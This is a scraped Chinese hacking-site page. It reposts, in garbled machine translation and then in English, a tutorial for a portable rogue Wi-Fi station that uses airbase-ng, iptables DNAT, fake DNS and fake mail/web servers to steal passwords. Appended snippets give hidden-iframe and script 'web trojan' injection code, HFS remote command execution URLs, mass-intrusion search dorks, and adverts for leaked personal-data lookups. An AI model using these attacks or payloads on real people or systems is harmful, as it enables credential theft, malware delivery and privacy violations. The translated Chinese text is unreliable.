中国寒龙 黑阔教你怎么全自动无线入侵热点,黑客全自动WIFI钓鱼,大规模批量无线热点钓鱼 - 欢迎订阅

本文介绍一种工作的所有功能于一身的自动无线电攻击,没有任何互联网连接或其它外部连接或影响执行上的客户端类型的MITM攻击。

在外行人而言; 这种便携式电池供电设备能够自动吸引的无线设备连接到它,是因为iPhone手机/ ipad公司,机器人和其他手机或笔记本电脑和个人电脑。大多数设备将自动连接到它无需用户甚至没有意识到。该设备将提供一个假的网络中运行的假电子邮件和Web服务器,并使用一些网络挂羊头卖狗肉,将捕获任何试图连接的主机名,用户名和密码,并记录它,随着GPS坐标,其中的细节被抓获的。该设备可用于劫持的企业和个人电子邮件登录、Facebook的登录、等等。

在摆弄airbase-ng aircrack-ng套件的一部分,在过去的几个月,研究无线客户端漏洞导致一个有趣的概念验证项目。有一些缺点在当前广泛使用的无线技术。然而,第一个项目的一个解释。项目描述是发射无线中间人这个攻击,而无需另一个终端连接的受害者。我们需要创建一个MITM攻击没有任何互联网接入。这样的攻击理论上可以用于管,在锁定建筑,此举,等等,没有移动数据卡的使用。之上的修改覆盆子中欧地区,尽管任何Linux发行版将是合适的,我已经把我的无线设备30 dbm的输出功率,并开始自动化流程如下:

首先,一个空军基地实例在我rtl8187卡如下;

/usr/local/sbin/airbase-ng -c 3 wlan0 –essids “/root/pen/code/scripts/essids” -P -C 60 -I 60 -vv|grep –line-buffered “directed probe request”| tee /run/probes

这开始一个接入点3频道,指引中包含的ssid /root/pen/code/scripts/essids以及任何调查请求访问点可能收到客户希望连接到访问点。现在,在更多的细节,定期“non-hidden”接入点将播出“灯塔”指定的数据块的SSID(无线网络名称)以及支持加密类型等等。这些信号通常发送的每100毫秒。无线客户端将发送探测包,包含所有无线网络的ssid,存储,并要求如果他们都在这里。


Fully Automatic Wireless Hacking Station

April 26, 2013/14 Comments/in Linux, Perl, Projects, Raspberry Pi, Security Consultant, Wireless /by Adam Palmer+

This article describes a working all-in-one standalone mobile wireless attack station that can perform MITM type attacks on clients automatically and without any internet access or other external connectivity or influence.

In laypersons terms; this portable battery powered device can automatically entice wireless devices to connect to it, be that iPhones/iPads, Androids and other phones or laptops and PCs. Most devices will connect to it automatically without the user even realizing. The device will provide a fake network running fake email and web servers and using some network trickery, will capture the hostname, username and password of any attempted connection and log it, along with the GPS co-ordinates of where the details were captured. This device could be used to hijack corporate and personal email logins, facebook logins, and so on.

Messing around with airbase-ng, part of the aircrack-ng suite over the last few months and researching wireless client vulnerabilities has led to an interesting proof of concept project. There are several weaknesses within the current wireless technologies in widespread use. First however, an explanation of the project. The project description was to launch a wireless man in the middle (MITM) attack, without having another end to connect the victim to. We need to create a MITM attack without having any internet access. Such an attack could theoretically be used on the tube, in locked down buildings, on the move, and so on, and without the use of a mobile data card. Built on top of a modified raspberry pwn release, although any Linux distribution would have been suitable, I have set my wireless device with a power output of 30dBm and started the following automated process:

Firstly, an airbase instance on my rtl8187 card as follows;

/usr/local/sbin/airbase-ng -c 3 wlan0 –essids “/root/pen/code/scripts/essids” -P -C 60 -I 60 -vv|grep –line-buffered  “directed probe request”|tee /run/probes

This starts an access point on channel 3, beaconing the SSIDs contained within /root/pen/code/scripts/essids as well as any probe requests that the access point may receive from clients looking to connect to an access point. Now, in a little more detail, regular ‘non-hidden’ access points will broadcast ‘beacons’ which are pieces of data that specify the SSID (wireless network name) as well as the supported encryption types and so on. These beacons are usually sent every 100msec. Wireless clients will send probe packets, containing the SSIDs of all wireless networks that they have stored, and asking if any of them are here.

The -P switch to airbase-ng will have airbase respond to all probes saying “yes, that’s me” at which point assuming the encryption or lack thereof matches the stored profile, the client will attempt to associate. Mid way through building this test however, Apple released IOS 6, and one of the changes seems that the iPhone will now only send out broadcast probes rather than directed probes, rendering the -P feature useless against them. The broadcast probe is where the device sends out a “is anyone there?” probe, and waits to see which access points reply. Most iPhones however have connected at some point to a wireless hotspot, and so the SSIDs I chose for the essids file are “Boingo Hotspot”, “BTOpenzone” and “BTWiFi” in the UK. I believe that “attwifi” is a popular one in the US.

We then wait for airbase-ng’s `at0′ interface to come up, before starting a DHCP server handing IPs out on the 10.0.0.0/16 range whilst at0 itself is set to 10.0.0.1. Clients are set with DNS and router set to 10.0.0.1.

We then create a DNAT entry with iptables to redirect any traffic that comes in on at0 that would have been routed back to ourselves on 10.0.0.1;

iptables -t nat -A PREROUTING -i at0 -j DNAT –to-destination 10.0.0.1

Remembering that we have no default gateway, the biggest issue we have is that whilst we can run fake services on our device, we have no way of performing DNS lookups, and therefore even if we respond to all DNS A requests with ‘10.0.0.1’, we’ll most likely be logging useless credentials.

At this point, I thought it would be a good idea to brush up on my programming skills and relearn PERL. Using the POE framework and sqlite3, we next run a fake DNS server. The DNS server is assigned a range, in this case 199.0.0.0/8 on which to hand out IPs. The first request is assigned 199.0.0.1 and logged in the database, the second request 199.0.0.2, and so on. If we already have a record of that request, we’ll hand out the IP we handed out the last time. Whether the client accepts our DNS or has their own hardcoded, the DNAT will redirect any DNS request to our device. Our DNS table might look something like;

id ip host
1 199.0.0.1 apple.com
2 199.0.0.2 www.google.com
3 199.0.0.3 m.google.com
4 199.0.0.4 imap.gmail.com

Now, iDevices and Blackberries attempt to connect to a URL to confirm internet service. If they do not receive the expected response, they assume they are on a wireless hotspot and pull up a login page. We must satisfy the query to pretend to the devices that they have valid internet access.

The next step in the process is where the client tries to connect to a service. I have currently built protocol support for POP3, IMAP, HTTP and their SSL versions, and additional services can be added easily.

Once the client initiates a connection, it is redirected back to us over DNAT. Under Linux, we have the originally requested destination IP available by using the socket option SO_ORIGINAL_DST. Assuming the client attempts to connect to 199.0.0.3 now over IMAP, our IMAP server implements enough of the protocol to log the credentials and keep the client happy, as well as looking up the requested hostname ‘m.google.com’ in the sqlite3 database and presenting it as the banner.

Should SSL be in use, we dynamically create a self signed certificate for ‘m.google.com’ and present it to the client. It will yield the usual SSL warning although having a matching hostname, the non-technical user is more likely to accept. The iPhone [4 at least] had an annoying feature where no matter how many times ‘cancel’ is clicked, it will keep presenting with the same SSL warning until ‘continue’ is clicked or wifi is shut off. This almost guarantees that the user will click continue. In addition, whilst testing, I did not even realise at first that the warning I was presented with on the iPhone was even an SSL certificate warning. I am very surprised that the warning is not worded in stronger terms than it is.

Once we have credentials, these are logged in a separate table and related back to an IP entry which ultimately relates back to the original host the user attempted to connect to. Thus we are able to log host details, username and passwords on a standalone portable device with no network connectivity. Lastly, the device was kitted out with a BlueNEXT GPS dongle, and so GPS coordinates can be logged if they are available for where credentials were sniffed.

It is not legally possible to actively run such a device in public, however based on internally testing the system with my own devices, as well as passively collecting some of the broadcast probes sent over the air in public places, running such a device in public could very easily harvest many hundreds of passwords ranging from home to corporate in only a few minutes at a suitably busy location. Furthermore, as the device has no internet or external connectivity of its own, and the attacker would be entirely untraceable.

In my next posting, I will discuss some of the weaknesses we touched upon and how they can be overcome.

source: http://www.iodigitalsec.com/fully-automatic-wireless-hacking-station/   本文截图转自以上网站 大家可以进入观看正文 欢迎进入!

时间: 2024-08-07 14:13:53

中国寒龙 黑阔教你怎么全自动无线入侵热点,黑客全自动WIFI钓鱼,大规模批量无线热点钓鱼 - 欢迎订阅的相关文章

利用谷歌实现批量入侵的方法 -中国寒龙

route print 查看本机设置网络 intext:这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似. intitle: 和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网页.同理allintitle:也同intitle类似. ca

网页挂马大全集 -中国寒龙出品 转载写明出处www.hackerschina.org

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCR

中国寒龙反网络病毒联盟官网www.hackerschina.org更新公告。社工库更新公告。

大家好欢迎使用中国寒龙反网络病毒联盟在线平台. 本平台为国际公益网站SEC平台 在这里本站近期更新的社工库包括:天涯数据 乌云网会员数据 南宫数据 中南股份数据 QQ数据 和某住址社工MM数据 以及个人数据  如果再本站搜索不到您想要的资料说明本站未曾更新您相关的数据资料 不过在此您对本站搜索关键字的使用需要有一定的技巧设置如:搜索 人名字  QQ号  手机号 身份证号等等产品序列号等等,本产品序列号和商家号只供搜索中南股份和南宫的数据.谢谢使用本站. 另外本站在年底期间将会升级服务器,,升级期

中国寒龙博客www.hackerschina.org:代码审计:PHP中is_numeric函数十六进制绕过BUG 发生的安全问题有哪些?

0×00 简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric ( mixed $var )如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE. 0×01 函数是否安全接下来我们来看个例子,说明这个函数是否安全. $s = is_numeric($_GET['s'])?$_GET['s']:0; $sql="insert into test(type)values($s);";//是 values($

[中国寒龙联盟出品]C语言基础知识视频教程第一课-C语言简史,特点,基本结构,函数printf()和scanf()使用和c语言的开发过程。

本视频由中国寒龙收集整理发布,更多请关注我们的博客和,我们的官网:www.hackerschina.org  感谢朋友们的支持!

中国寒龙社工包v3.34 6.1升级版本已经发布 具体请到官网下载!!感谢支持!~~~~~不会升级的请到咱们交流群!本程序在windowsxp下最为兼容 感谢支持!如果有BUG请反馈!!

寒龙社会工程包:http://pan.baidu.com/s/1dDcilBb当你看到 中国寒龙V3.34 6.1版本的发布  那么本工具包将更强大的 展现了工具包的价值! 本次开发由by:寒龙升级  感谢大家支持 如果有各位小组的支持 本人不谢感激! 当然本站内的工具包 可以提供专门店小组工具包 制作!承接QQ群:94588528 本次手动升级  修复一下几点的不足! v3.33版本出现的  各种打不开的问题 v3.33版本中出现 主程序远控不能配置的问题 v3.33版本 部分 文件夹不能打开

国外软件HFS 2.3x 远程命令执行漏洞 (本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件)本站教程教习如何梨园远程命令执行。。中国寒龙

这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔. 1 2 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的. 测试部分:百度搜HFS默认就是2.3x版本,执行echo测试成功: 1 http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123

编程类:计算机病毒的编写思考 原创:中国寒龙病毒联盟官网

如果你想好好的学习这门艺术 那么我将带您走进这未来的世界里来 ...今天刚刚开通了  博客 那么心情也是灰常不错的!好了 废话不多说  这里要讲到的是 常见的 感染类型的计算机病毒...呵呵只是空谈 如果大家有编程基础可以自己写的!计算机感染 可以通过 各种处理办法来达到目的 现在网上开源的源码也有许多  那么咱们就  如何编写计算机病毒一题开始讨论!如果编写呢?那么咱们将的 是批处理!因为批处理有很多好处 现在 咱们学到了 很多编程里运用的批处理方法 包括vb  vc vc++  E 以及 C

中国寒龙反网络病毒联盟官方荣誉出品 -对接 国外在线 聊天室 畅聊版本 对接全世界网络摄像头 随时随地聊不停,今天写的是教程欢迎访问!

教程请往下面看 上面是 聊天截图  嗯 主站聊天对接网进入口是:www.hackerschina.org大家好,我是寒龙很高兴与大家 共享本站平台  本站平台基于 世界版本在线聊天 !首先看教程!教程如下操作说明!首先点击:www.hackerschina.org 网站  然后点击[寒龙国际聊天]这个按钮!如图所示: 接下来等待几秒会进入对接页面:CR  我们 要点击  Start (F2) 这个按钮   这个按钮 点开以后 会看到  这个对话框Authorization Username是用户